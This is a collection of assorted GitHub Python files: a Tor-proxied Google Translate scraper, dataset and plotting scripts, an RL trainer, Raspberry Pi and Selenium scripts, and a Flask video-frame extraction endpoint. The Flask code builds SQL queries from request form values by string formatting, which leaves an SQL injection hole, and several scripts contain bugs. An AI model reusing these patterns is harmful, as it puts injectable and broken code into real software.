'\"az\":\"Azerbaijani\",\"eu\":\"Basque\",\"bn\":\"Bengali\",\"be\":\"Belorussian\",'\n '\"bg\":\"Bulgarian\",\"ca\":\"Catalan\",\"zh-CN\":\"Chinese Simplified\",'\n '\"zh-TW\":\"Chinese Traditional\",\"hr\":\"Croatian\",\"cs\":\"Czech\",'\n '\"da\":\"Danish\",\"nl\":\"Dutch\",\"en\":\"English\",\"eo\":\"Esperanto\",'\n '\"et\":\"Estonian\",\"tl\":\"Filipino\",\"fi\":\"Finnish\",\"fr\":\"French\",'\n '\"gl\":\"Galician\",\"ka\":\"Georgian\",\"de\":\"German\",\"el\":\"Greek\",'\n '\"gu\":\"Gujarati\",\"ht\":\"Haitian Creole\",\"iw\":\"Hebrew\",'\n '\"hi\":\"Hindi\",\"hu\":\"Hungarian\",\"is\":\"Icelandic\",'\n '\"id\":\"Indonesian\",\"ga\":\"Irish\",\"it\":\"Italian\",'\n '\"ja\":\"Japanese\",\"kn\":\"Kannada\",\"ko\":\"Korean\",'\n '\"la\":\"Latin\",\"lv\":\"Latvian\",\"lt\":\"Lithuanian\",\"mk\":\"Macedonian\",'\n '\"ms\":\"Malay\",\"mt\":\"Maltese\",\"no\":\"Norwegian\",\"fa\":\"Persian\",'\n '\"pl\":\"Polish\",\"pt\":\"Portuguese\",\"ro\":\"Romanian\",\"ru\":\"Russian\",'\n '\"sr\":\"Serbian\",\"sk\":\"Slovak\",\"sl\":\"Slovenian\",\"es\":\"Spanish\",'\n '\"sw\":\"Swahili\",\"sv\":\"Swedish\",\"ta\":\"Tamil\",\"te\":\"Telugu\",'\n '\"th\":\"Thai\",\"tr\":\"Turkish\",\"uk\":\"Ukrainian\",\"ur\":\"Urdu\",'\n '\"vi\":\"Vietnamese\",\"cy\":\"Welsh\",\"yi\":\"Yiddish\"}}')\n except IOError:\n raise GoogletTranslateException(self.error_codes[503])\n except ValueError:\n raise GoogletTranslateException(self.error_codes[501])\n return self.cache['languages']\n\n def translate(self, text, format='html'):\n data = self._get_translation_from_google(text)\n # if (format == 'plain')\n # data =\n return data\n\n def _get_translation_from_google(self, text):\n try:\n json5 = self._get_json5_from_google(text).decode('utf-8')\n except IOError:\n raise GoogletTranslateException(self.error_codes[503])\n except ValueError:\n raise GoogletTranslateException(self.error_codes[501])\n return self._unescape(self._get_translation_from_json5(json5.encode('utf-8')))\n\n def _get_json5_from_google(self, text):\n esc_surce = quote(text, '')\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}\n enable_proxy = True\n if enable_proxy:\n opener = build_opener(SocksiPyHandler(socks.PROXY_TYPE_SOCKS5, \"127.0.0.1\", 9050))\n result_url = self.api_urls['translate'] + \"&sl=%s&tl=%s&text=%s\" % (self.source, self.target, esc_surce)\n print('result_url1:' + result_url)\n req = Request(result_url, 
headers=headers)\n            result = opener.open(req, timeout=5).read()\n            json = result\n\n        else:\n            try:\n                result_url = self.api_urls['translate'] + \"&sl=%s&tl=%s&text=%s\" % (self.source, self.target, esc_surce)\n                print('result_url2:' + result_url)\n                # urlopen() has no headers kwarg, so wrap the URL in a Request\n                req = Request(result_url, headers=headers)\n                result = urlopen(req, timeout=5).read()\n                json = result  # keep the raw bytes; the caller decodes them\n            except IOError:\n                raise GoogletTranslateException(self.error_codes[503])\n            except ValueError:\n                raise GoogletTranslateException(result)\n        return json\n\n    def _get_translation_from_json5(self, content):\n        result = \"\"\n        pos = 2\n        while True:\n            m = self.match_string.match(content.decode('utf-8'), pos)\n            if not m:\n                break\n            result += m.group(1)\n            pos = m.end()\n        return result\n\n    @staticmethod\n    def _unescape(text):\n        return loads('\"%s\"' % text)\n\n\nclass SocksiPyConnection(HTTPConnection):\n    def __init__(self, proxytype, proxyaddr, proxyport=None, rdns=True, username=None, password=None, *args, **kwargs):\n        self.proxyargs = (proxytype, proxyaddr, proxyport, rdns, username, password)\n        HTTPConnection.__init__(self, *args, **kwargs)\n\n    def connect(self):\n        self.sock = socks.socksocket()\n        self.sock.setproxy(*self.proxyargs)\n        if type(self.timeout) in (int, float):\n            self.sock.settimeout(self.timeout)\n        self.sock.connect((self.host, self.port))\n\n\nclass SocksiPyConnectionS(HTTPSConnection):\n    def __init__(self, proxytype, proxyaddr, proxyport=None, rdns=True, username=None, password=None, *args, **kwargs):\n        self.proxyargs = (proxytype, proxyaddr, proxyport, rdns, username, password)\n        HTTPSConnection.__init__(self, *args, **kwargs)\n\n    def connect(self):\n        sock = socks.socksocket()\n        sock.setproxy(*self.proxyargs)\n        if type(self.timeout) in (int, float):\n            sock.settimeout(self.timeout)\n        sock.connect((self.host, self.port))\n        self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file)\n\n\nclass SocksiPyHandler(HTTPHandler, HTTPSHandler):\n    def __init__(self, *args, **kwargs):\n        self.args = args\n        self.kw = kwargs\n        HTTPHandler.__init__(self)\n\n    def http_open(self, req):\n        def build(host, port=None, strict=None, timeout=0):\n            conn = SocksiPyConnection(*self.args, host=host, port=port, strict=strict, timeout=timeout, **self.kw)\n            return conn\n\n        return self.do_open(build, req)\n\n    def https_open(self, req):\n        def build(host, port=None, strict=None, timeout=0):\n            conn = SocksiPyConnectionS(*self.args, host=host, port=port, strict=strict, timeout=timeout, **self.kw)\n            return conn\n\n        return self.do_open(build, req)\n\n\nif __name__ == \"__main__\":\n    translate = GoogletTranslate('en', 'fr')\n    resulto = translate.translate('Hello, Beijing', 'html')\n    print('resulto:' + resulto)\n","repo_name":"zeusintuivo/SublimeText3-GoogleT","sub_path":"test/testtranslate.py","file_name":"testtranslate.py","file_ext":"py","file_size_in_byte":8207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26809743488","text":"from __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nimport tensorflow as tf\nimport os\nfrom urllib.request import urlretrieve\nimport sys\nimport zipfile\nimport tarfile\nimport pickle\nimport cv2 as cv\nimport matplotlib.pyplot as plt\n\ndef print_download_progress(count, block_size, total_size):\n    pct_complete = float(count * block_size)/total_size\n    msg = \"\\r- Download progress: {0:.1%}\".format(pct_complete)\n    sys.stdout.write(msg)\n    sys.stdout.flush()\n\n\n\ndef download_cifa10(output_dir=None, url=None):\n    if url is None:
\n        url = \"http://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz\"\n\n    if output_dir is None:\n        output_dir = \"./cifa10\"\n\n    if not os.path.exists(output_dir):\n        os.mkdir(output_dir)\n\n    file_path = url.split(\"/\")[-1]\n    file_path = os.path.join(output_dir, file_path)\n\n    if not os.path.exists(file_path):\n        file_path, _ = urlretrieve(url=url, filename=file_path, reporthook=print_download_progress)\n\n\n    print(\"\")\n    print(\"Download finished, Extracting file\")\n\n    if file_path.endswith(\".zip\"):\n        zipfile.ZipFile(file=file_path, mode=\"r\").extractall(output_dir)\n\n    elif file_path.endswith((\".tar.gz\", \".tgz\")):\n        tarfile.open(name=file_path, mode=\"r:gz\").extractall(output_dir)\n\ndef make_data(dir=None):\n    if dir is None:\n        return None\n\n    for i in range(5):\n        file_name = os.path.join(dir, \"data_batch_\" + str(i+1))\n        f = open(file_name, 'rb')\n        data_dict = pickle.load(f, encoding='latin1')\n        f.close()\n\n        _X = data_dict[\"data\"]\n\n        _Y = data_dict[\"labels\"]\n\n        _X = _X.reshape([-1, 3, 32, 32])\n\n        plt.imshow(_X[0].transpose(1, 2, 0))  # CHW -> HWC so the RGB image displays correctly\n        plt.show()\n\n\nif __name__ == '__main__':\n    download_cifa10()\n    make_data(\"./cifa10/cifar-10-batches-py\")","repo_name":"dattv/ML-DL-Lecture-Notes","sub_path":"TFRecord/cifa10_TFRecord.py","file_name":"cifa10_TFRecord.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"7180915714","text":"__author__ = 'jujuman'\n\nimport numpy as np\nimport hdnntools as hdt\nimport matplotlib.pyplot as plt\n\ndata = np.loadtxt('/home/jujuman/Research/ANI-DATASET/ANI-SF-TRAIN/cv_c08e_ntw_0/cost.dat',delimiter=' ',dtype=np.float32)\nprint(data)\nplt.plot (data[1:,0],hdt.hatokcal*np.sqrt(data[1:,1]),marker='o', color='blue', label='Train', linewidth=2)\nplt.plot (data[1:,0],hdt.hatokcal*np.sqrt(data[1:,2]),marker='o', color='red', label='Valid', linewidth=2)\nplt.plot (data[1:,0],hdt.hatokcal*np.sqrt(data[1:,3]),marker='o', color='green', label='Best', linewidth=2)\n\nplt.yscale('log')\n\nplt.title(\"C10H20 - ANI vs DFT\")\n\nplt.ylabel('Error')\nplt.xlabel('Epoch')\nplt.legend(bbox_to_anchor=(0.8, 0.95), loc=2, borderaxespad=0.,fontsize=16)\n\nfont = {'family' : 'Bitstream Vera Sans',\n        'weight' : 'normal',\n        'size'   : 16}\n\nplt.rc('font', **font)\n\nplt.show()","repo_name":"Jussmith01/PycharmProjects","sub_path":"HD-AtomNNP/NeuroChemPrograms/plot_learning_curve.py","file_name":"plot_learning_curve.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13073670029","text":"import argparse, os\nfrom tqdm import tqdm\nfrom typing import Any, Iterator, Mapping, MutableMapping, Optional, Union\n\nimport numpy as np\nimport numpy.random as rnd\nimport torch as pt\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom absl import logging\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom arguments import get_args\nfrom env import get_env_config, get_env, Toggle, Maze\nfrom helpers import get_p_action_target, value_act\nfrom model import get_actor_critic_config, ActorCritic, Reservoir\nfrom optimizer import CoreOptimizer\nfrom utils import activation_fn, convert_to_tensor, fix_seed, join_tokens, loss_fn, TensorDict, TensorType \n\nlogging.set_verbosity(logging.INFO)\n\n\nclass Trainer():\n\n    '''\n    Responsible for setting up model (including embedders and task modules), optimizer etc., as well as training and evaluation
as training and evaluation\n '''\n\n def __init__(self,\n args: MutableMapping[str, Any],\n actor_critic_config: Mapping[str, Any], \n output_dir: Optional[str] = None) -> None:\n \n self.save_iteration = args.save_iteration\n self.log_iteration = args.log_iteration\n self.output_dir = output_dir\n self.writer = SummaryWriter()\n\n self.transition_table = pt.Tensor([-1, 0, 1])\n assert args.n_actions == len(self.transition_table)\n\n self.actor_critic = ActorCritic(actor_critic_config).to(args.device)\n self.actor_target = ActorCritic(actor_critic_config).to(args.device)\n self.actor_target.load_state_dict(self.actor_critic.state_dict(), strict=False)\n self.loss_fn = loss_fn(args.loss_fn)\n self.reservoir = Reservoir(actor_critic_config, self.transition_table).to(args.device)\n\n if args.optimizer_class == 'adam':\n self.optimizer = pt.optim.Adam(self.actor_critic.parameters(), lr=args.lr, weight_decay=args.weight_decay) \n elif args.optimizer_class == 'rms_prop':\n self.optimizer = pt.optim.RMSprop(self.actor_critic.parameters(), lr=args.lr, weight_decay=args.weight_decay, momentum=args.momentum)\n elif args.optimizer_class == 'core':\n self.optimizer = CoreOptimizer(self.actor_critic.parameters(), lr=args.lr, args=args)\n elif args.optimizer_class == 'swarm':\n self.optimizer = SwarmOptimizer(self.actor_critic.parameters(), lr=args.lr, args=args)\n else:\n raise NotImplementedError()\n\n self.global_step = 1\n if hasattr(args, 'scheduler'):\n self.schedulers = utils.scheduler\n if hasattr(args, 'timer'):\n self.timer = utils.timer\n\n self.state_dict_path = f'state_dict/actor_critic_{args.env_id}'\n if self.output_dir:\n if os.path.isdir(self.output_dir):\n logging.info(f'Output directory \"{self.output_dir}\" already exists. Calling train will attempt to start from last checkpoint.')\n os.makedirs(self.output_dir, exist_ok=True)\n\n self.args = args\n\n def _save_states(self):\n\n '''Saves current step, model parameters, and optimizer parameters'''\n \n state = {\n 'model_state_dict': self.actor_critic.state_dict(),\n 'optimizer_state_dict': self.optimizer.state_dict(),\n 'global_step': int(self.global_step)\n }\n pt.save(state, self.state_dict_path)\n \n def _load_states(self,\n state_dict_path: str,\n step: Optional[int] = None) -> None:\n\n '''Loads current step, model parameters, and optimizer parameters'''\n \n if not os.path.exists(state_dict_path):\n raise ValueError(f'No file `{state_dict_path}`.')\n\n state = pt.load(state_dict_path)\n step = state.get['global_step']\n self.actor_critic.load_state_dict(state['model_state_dict'])\n self.optimizer.load_state_dict(state['optimizer_state_dict'])\n self.global_step.fill_(step)\n logging.info(f'Loaded state from step {step}.')\n return step\n\n def train(self,\n env: Union[Iterator, Any],\n load: Optional[bool] = False,\n state_dict_path: Optional[str] = None) -> None:\n\n if load:\n start_step = self._load_states(state_dict_path)\n else:\n start_step = self.global_step\n logging.info('start training')\n self.actor_critic.train(True)\n\n u, state_target, done = env.reset()\n if hasattr(self, 'reservoir'):\n x = self.reservoir.clear()\n\n p_action_list = []\n p_action_target_list = []\n\n for t in tqdm(range(start_step, self.args.n_episodes + start_step)):\n\n u, state_target = convert_to_tensor(u), convert_to_tensor(state_target)\n p_action, action = self.actor_critic.act(join_tokens(u, x))\n p_action_target = get_p_action_target(self.args, x, state_target, self.transition_table)\n x, state_transition = self.reservoir.update(x, idx 
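# --- Added note (hedged), on the Trainer._load_states method above: as
# written, `state.get['global_step']` subscripts the bound dict method and
# would raise a TypeError, and `self.global_step.fill_(step)` assumes a
# tensor even though `global_step` is initialised as the plain int 1.
# A likely intended version of those two lines is:
#     step = state['global_step']
#     self.global_step = step
# which keeps `global_step` an int, matching `self.global_step += 1`
# in the training loop.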
= action)\n p_action_list.append(p_action.probs)\n p_action_target_list.append(p_action_target)\n\n u, state_target, done = env.step()\n self.global_step += 1\n\n if t % self.save_iteration == 0:\n self._save_states()\n\n if done:\n p_action_list = pt.stack(p_action_list, 0)\n p_action_target_list = pt.stack(p_action_target_list, 0)\n loss = self.loss_fn(pt.log(p_action_list), p_action_target_list, reduction='batchmean')\n self.writer.add_scalar('Loss/train', loss.item(), t)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n p_action_list = []\n p_action_target_list = []\n u, state_target, done = env.reset()\n x = self.reservoir.clear()\n\n self.writer.close()","repo_name":"sebvoigtlaender/latent_manifold_RL","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"38097091091","text":"import os\nimport sys\nimport multiprocessing\nimport socket\n\nimport time\nimport RPi.GPIO as GPIO\n\n \n#p = GPIO.PWM(18, 50) # 通道为 18 频率为 50Hz\n#p.start(0)\n#try:\n# while 1:\n# control_data = s.recv(20)\n# if control_data == b'start':\n# s.send(b'start ok')\n# GPIO.output(18,GPIO.LOW)\n #for dc in range(100, -1, -5):\n # p.ChangeDutyCycle(dc)\n # time.sleep(0.1)\n #for dc in range(0, 101, 5):\n # p.ChangeDutyCycle(dc)\n # time.sleep(0.1)\n# if control_data == b'end':\n# s.send(b'end ok')\n# GPIO.output(18,GPIO.HIGH)\n#except KeyboardInterrupt:\n# pass\n#p.stop()\n#GPIO.cleanup()\n\ndef start_led(control_data):\n control_data = b'null'\n print('start_led')\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n s.connect(('192.168.0.101', 7777))\n s.send(b'start_led_connect ok')\n while 1:\n control_data = s.recv(20)\n if control_data == b'start':\n s.send(b'start ok')\n\n\ndef end_led(control_data):\n control_data = b'null'\n print('end_led')\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n s.connect(('192.168.0.101', 7778))\n s.send(b'end_led_connect ok')\n while 1:\n control_data = s.recv(20)\n if control_data == b'end':\n s.send(b'end ok')\n\n\nif __name__ == \"__main__\":\n GPIO.setmode(GPIO.BCM) #BCM编号系统\n GPIO.setup(18, GPIO.OUT)\n GPIO.output(18,GPIO.HIGH)\n \n \n p1 = multiprocessing.Process(target = start_led, args = (control_data,))\n p2 = multiprocessing.Process(target = end_led, args = (control_data,))\n\n p1.start()\n p2.start()\n","repo_name":"hujiaodigua/rpi_gpio","sub_path":"test-pwm3_multiprocess.py","file_name":"test-pwm3_multiprocess.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"23637878291","text":"import pytest\nfrom selenium import webdriver\nimport time\n\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n\ndef test_basket(browser):\n browser.get(link)\n browser.implicitly_wait(15)\n text = browser.find_element_by_class_name(\"btn.btn-lg.btn-primary.btn-add-to-basket\").text\n time.sleep(15)\n assert bool(text) == True, \"Кнопка не найдена\"\n","repo_name":"FBernardeschi/stepik_test_of_language","sub_path":"test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20316508393","text":"from sw_simulation import SWSimulation\n\nimport asyncio\nimport jax.numpy as jnp\n\ndef run_simulation(w0_mult):\n print(f'{w0_mult} started')\n sim = 
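# --- Added note (hedged), on the RPi multiprocessing entry above: in its
# __main__ block, `control_data` is handed to both Process targets but is
# never defined there, so the script would raise a NameError before the
# workers start. Each worker immediately overwrites its argument, so one
# plausible minimal fix is a placeholder defined first:
#     control_data = b'null'
#     p1 = multiprocessing.Process(target=start_led, args=(control_data,))
#     p2 = multiprocessing.Process(target=end_led, args=(control_data,))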
SWSimulation(w_0_mult=w0_mult)\n\n sim.run()\n print(f'{w0_mult} finished')\n\nasync def main():\n # asynchronously run the simulation for a range of w_0_mult values from 0.1 to 1.0\n w0_mult_range = [0.0, 0.2, 0.4, 0.6, 0.8, 1.0]#[0.1, 0.3, 0.5,0.7,0.]#jnp.linspace(0.0, 1.0, num=20)\n tasks = await asyncio.gather(*[run_simulation(w0_mult) for w0_mult in w0_mult_range])\n print(tasks)\n\nif __name__ == '__main__':\n asyncio.run(main())","repo_name":"DaviAlefe/tcc-simulations","sub_path":"sw_runner.py","file_name":"sw_runner.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18502138357","text":"from collections import deque\n\ndef parse_board(board):\n parsed_board = [line.split() for line in board]\n return [[parse_square(square) for square in row] for row in parsed_board]\n\ndef parse_square(square):\n if square == \"Start\":\n return \"Start\"\n if square == \"End\":\n return \"End\"\n if square.startswith(\"S(\"):\n return -int(square[2:-1])\n if square.startswith(\"L(\"):\n return int(square[2:-1])\n return int(square)\n\ndef possible_to_reach_end(board, die_inputs):\n board = parse_board(board)\n start, end = 1, 100\n visited = [False] * 101\n visited[start] = True\n queue = deque([(start, 0, 0, 0)]) # (position, snakes, ladders, moves)\n\n while queue:\n position, snakes, ladders, moves = queue.popleft()\n\n if position == end:\n return f\"Possible {snakes} {ladders}\"\n\n for die in die_inputs:\n for _ in range(die): # Iterate over each possible roll of the die\n new_position = position + 1\n if 1 <= new_position <= 100 and not visited[new_position]:\n visited[new_position] = True\n next_square = board[new_position - 1] # Adjust for 0-based indexing\n if next_square == \"Start\":\n next_square = 1\n if next_square == \"End\":\n next_square = 100\n if isinstance(next_square, int):\n queue.append((next_square, snakes, ladders, moves + 1))\n elif isinstance(next_square, list) and next_square[0] < 0:\n snakes += 1\n elif isinstance(next_square, list) and next_square[0] > 0:\n ladders += 1\n\n return f\"Not possible {snakes} {ladders}\"\n\n# Input\nboard = [\n \"End 99 98 S(7) 96 95 94 93 92 91\",\n \"81 82 L(99) 84 85 86 87 88 89 90\",\n \"80 79 78 77 76 75 74 73 72 71\",\n \"61 62 S(22) 64 65 66 67 68 69 70\",\n \"60 59 58 S(14) 56 57 54 53 52 51\",\n \"41 42 43 44 45 46 L(80) 48 49 50\",\n \"40 39 38 37 36 35 34 33 32 31\",\n \"21 22 23 L(63) 25 26 27 28 29 30\",\n \"20 19 S(2) 17 16 15 14 13 12 11\",\n \"Start 2 3 4 5 6 7 8 9 10\"\n]\n\ndie_inputs = [5, 4, 2, 4, 1]\n\n# Output\nresult = possible_to_reach_end(board, die_inputs)\nprint(result)\n","repo_name":"Prangyajyotidakua/python","sub_path":"tcscodevita/soluB_2.py","file_name":"soluB_2.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71376595650","text":"import cv2 \nimport os \nfrom config import DIR\nfrom models import db_file\nfrom app import app\nfrom flask import request\nfrom .database import insert_file,insert_folder\n\n# outPutDir 视频路径 videoName 视频名字 \ndef get_frame_name(outPutDir, videoName, times):\n #命名视频帧\n n = len(videoName)\n # '0'*(3-n) 表示有几个0\n videoName = '0'*(3-n) + videoName\n n = len(str(times))\n times = '0'*(4-n) + times\n # filename 视频帧名字\n # /data/dataset/zsh/videos/label_data/images/17(1)0001.jpg\n filename = outPutDir + videoName + times + '.jpg'\n # 服务器存放图片的路径,图片名字无后缀:17(1)0001\n return 
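# --- Added note + sketch (hedged), on the sw_runner entry above:
# `run_simulation` is a plain function, so the list comprehension runs every
# simulation sequentially and `asyncio.gather` then raises a TypeError on
# the resulting None values — and asyncio alone cannot parallelise
# CPU-bound work anyway. One common alternative, assuming the simulation
# arguments are picklable, is a process pool:
from concurrent.futures import ProcessPoolExecutor

def run_all(w0_mult_range):
    # Each w_0_mult value gets its own worker process.
    with ProcessPoolExecutor() as pool:
        list(pool.map(run_simulation, w0_mult_range))

if __name__ == '__main__':
    run_all([0.0, 0.2, 0.4, 0.6, 0.8, 1.0])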
[filename,videoName+times]\n\n# 提取视频帧,并且保存到指定文件里\n# videopath 视频文件路径,/zsh/videos/\n# videoName 视频名字,17(1)\n# outPutDir 视频文件抽帧后图片存放路径,/zsh/videos/label_data/images/\n# fileurl 从数据库拿到的服务器存放视频的路径,/data/dataset/yd_pose/dance/k-pop/maria/ori_data/round_1/videos/17.mp4\n# frame_cnt 表单数据,无\ndef get_frame(videoPath, videoName, outPutDir, fileurl, frame_cnt):\n #要提取视频的文件名\n sourceFileName=videoName\n #把后缀接上,服务器存放视频的路径\n # /data/dataset/zsh/videos/17.mp4\n video_path = DIR + videoPath + sourceFileName+'.mp4'\n print(video_path)\n # 计数用,多少帧截一张\n times=0\n #输出图片到当前目录vedio文件夹下\n # os.path.exists 文件夹存在返回True,反之返回false\n # /data/dataset/zsh/videos/label_data/images/\n if not os.path.exists(DIR+outPutDir):\n #如果文件目录不存在则创建目录\n # os.makedirs 递归生成文件夹,用来创建多层目录(单层用os.mkdir)\n # /data/dataset/zsh/videos/label_data/images/\n os.makedirs(DIR+outPutDir)\n # 插入文件夹,outPutDir[:-18]:文件名字,'label_data':文件路径\n # 把数据插入数据库\n insert_folder(outPutDir[:-18], 'label_data')\n insert_folder(outPutDir[:-7],outPutDir[-7:-1])\n # n 给视频帧命名用的\n n = 1\n # cv2.VideoCapture() 视频抽帧,视频图像化\n camera = cv2.VideoCapture(fileurl)\n # 获取视频的帧率\n fps = camera.get(cv2.CAP_PROP_FPS)\n #提取视频的频率,每50帧提取一个\n if frame_cnt:\n frameFrequency=int(frame_cnt)\n else:\n frameFrequency=int(fps)\n print(frameFrequency)\n print(frame_cnt)\n # 取出所有的图片和图片名字并且存放进数据库\n while True:\n # 取帧,从1开始\n times+=1\n # read() 读取名字和图片\n res, image = camera.read()\n print(res)\n # 判断res是否为None\n if not res:\n print('not res , not image')\n break\n # 每50帧提取一个,times从1-50,51取模不等于0\n if times%frameFrequency==0:\n # get_frame_name() 命名视频帧\n # /data/dataset/zsh/videos/label_data/images/\n # 服务器存放图片路径,视频名字,计数n\n res = get_frame_name(DIR+outPutDir, videoName, str(n))\n # res:服务器存放图片的路径,图片名字无后缀:17(1)0001\n n += 1\n # 取出视频帧路径,有名字后缀\n # /data/dataset/zsh/videos/label_data/images/17(1)0001.jpg\n filename = res[0]\n # 取出加上数字后的视频名字,,无后缀\n # 17(1)0001\n name = res[1]\n print(filename)\n print(name)\n # cv2.imwrite() 用于将图像保存到指定的文件,视频帧和视频帧对应的图片,\n # filename:要保存的文件的路径和名称,image:保存的图片\n cv2.imwrite(filename, image)\n sql = '''select * from userfile where filePath=\"{}\" and fileName=\"{}\"'''.format(outPutDir, name)\n # 判断是否从数据库拿到数据,db_file(sql) 从数据库拿数据\n if not db_file(sql):\n insert_file(outPutDir, name,'jpg')\n print('图片提取结束')\n # 释放资源\n camera.release()\n\n# #获取视频文件信息\ndef get_video_info(userFileIds):\n #获取视频文件信息\n sql = '''select fileName,filePath,extendName,fileId from userfile where userFileId in ({})'''.format(userFileIds)\n print(sql)\n #数据库操作\n result = db_file(sql)\n # 空列表\n videopath = []\n videolist = []\n videoextend = []\n videofileid = []\n for res in result:\n # 视频文件路径\n # 列表中添加数据\n videopath.append(res['filePath'])# /zsh/videos/\n # 视频文件名字\n videolist.append(res['fileName'])# 17(1)\n # lower() 大写字母转小写\n videoextend.append(res['extendName'].lower())#mp4\n videofileid.append(res['fileId'])#10161\n print(videopath)\n print(videoextend)\n # set() 转成一个集合{}\n videopath = set(videopath)\n videoextend = set(videoextend)\n # 判断视频文件路径是否存在\n if len(videopath) != 1:\n return 0\n # 判断视频文件名字是否存在 \n elif len(videoextend) != 1:\n return 1\n # list(videopath)[0] 视频文件路径集合中的第一个,/zsh/videos/\n # list(videoextend)[0] 视频文件名字后缀的第一个,mp4\n # videolist 存放视频文件名字的集合,17(1)\n # videofileid 视频文件Id,10161\n res = [list(videopath)[0], list(videoextend)[0], videolist, videofileid]\n return res\n\n# 批量抽取视频帧\n# 装饰器@ methods=['POST'] 代表这个url地址允许POST请求方式\n# post 客户端使用响应码来确定应用程序的操作是否成功\n# 通过route()装饰器的方法将函数连接到请求的URL上 ’/get_video_frame‘\n@app.route('/get_video_frame', methods=['POST'])\ndef get_video_frame():\n # 
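# --- Added sketch (hedged), equivalent to get_frame_name above: the manual
# '0'*(3-n) padding expresses left zero-padding by hand; str.zfill states
# the same intent more idiomatically. The function name below is
# hypothetical, for illustration only.
def get_frame_name_zfill(out_dir, video_name, times):
    stem = video_name.zfill(3) + str(times).zfill(4)
    return [out_dir + stem + '.jpg', stem]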
定义一个空字典\n resp = {}\n # 执行正确,后面碰到错误就之后退出\n resp['code'] = 0\n resp['msg'] = 'ok'\n # Request.Form:获取以POST方式提交的数据\n # request.form['userFileIds'] 获取表单中userFileIds对应的值\n userFileIds = request.form['userFileIds']\n frame_cnt = ''\n # 判断'frame_cnt'是否在表单中\n if 'frame_cnt' in request.form:\n # 如果存在就取出对应的值\n frame_cnt = request.form['frame_cnt']\n print(userFileIds)\n # get_video_info() 从数据库中取出视频文件的数据:\n # 没有取到数据就是0或1\n # 路径,后缀,名字,fileId\n video_info = get_video_info(userFileIds)\n # ==0:视频文件路径错误,==1:视频文件类型错误\n if video_info == 0:\n # 执行出错\n resp['code'] = 1\n # 视频路径错误\n resp['msg'] = 'Video Path Error'\n return resp\n elif video_info == 1:\n # 执行出错\n resp['code'] = 1\n # 视频类型错误\n resp['msg'] = 'Video Type Error'\n return resp \n # 视频文件路径\n videopath = video_info[0]# 路径 /zsh/videos/\n # 视频文件名字\n videolist = video_info[2]# 名字 17\n # 视频文件对应的fileId\n videofileid = video_info[3]# fileId 10161\n print(videopath)\n print(videolist)\n # 字符串切片判断路径是否是指定路径,否:文件路径错误\n # 当前路径是否是/videos/\n if videopath[-8:] != '/videos/':\n # 执行出错\n resp['code'] = 1\n # 视频路径错误\n resp['msg'] = 'Video Path Error'\n # 返回退出\n return resp\n # 如果是指定路径就在后面加上新路径拼凑成完整路径\n # outPutDir 视频抽帧后图片存放位置\n # /zsh/label_data/images/\n outPutDir=videopath[:-7]+'label_data/images/'\n # 视频文件名字长度\n n = len(videolist)\n # 视频名字对应的下标\n for i in range(n):\n # 循环把视频名字一个一个赋值过去\n video = videolist[i] # 17(1)\n # fileId \n fileid = videofileid[i] # 10161\n # 数据库查询id\n sql = '''select fileUrl from file where fileId={}'''.format(fileid)\n # 拿到的所有数据的第一条中和’fileUrl‘对应的数据\n #yd_pose/dance/k-pop/maria/ori_data/round_1/videos/17.mp4\n fileurl = db_file(sql)[0]['fileUrl'] \n # 把根目录路径加上,完整路径,服务器储存视频的绝对路径\n # /data/dataset/yd_pose/dance/k-pop/maria/ori_data/round_1/videos/17.mp4\n fileurl = DIR + '/' + fileurl\n # videopath 视频路径,/zsh/videos/\n # video 视频名字,17\n # outPutDir 视频文件抽帧后图片存放路径,/zsh/videos/label_data/images/\n # fileUrl 从数据库拿到的需要抽帧视频的路径,在服务器里,\n # /data/dataset/yd_pose/dance/k-pop/maria/ori_data/round_1/videos/17.mp4\n # frame_cnt 表单数据,无\n # 提取视频帧,并且保存到指定文件里\n get_frame(videopath, video, outPutDir, fileurl, frame_cnt)\n # 返回集合,里面存放code,msg,是否正确\n return resp","repo_name":"zsh123abc/python_flask","sub_path":"views/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":9183,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"21110895099","text":"from selenium import webdriver\r\nfrom time import sleep\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\ndriver = webdriver.Chrome()\r\ndriver.get('https://www.baidu.com')\r\ndriver.maximize_window()\r\nsleep(2)\r\n\r\n# 在Selenium中将鼠标键盘操作封装在 ActionChains 类中\r\n\r\n# 定位到 \"设置\" 标签\r\nelement = driver.find_element_by_xpath('//*[@id=\"s-usersetting-top\"]')\r\n\r\n# 创建一个鼠标操作的对象 [tʃeɪnz]\r\n# mouse = 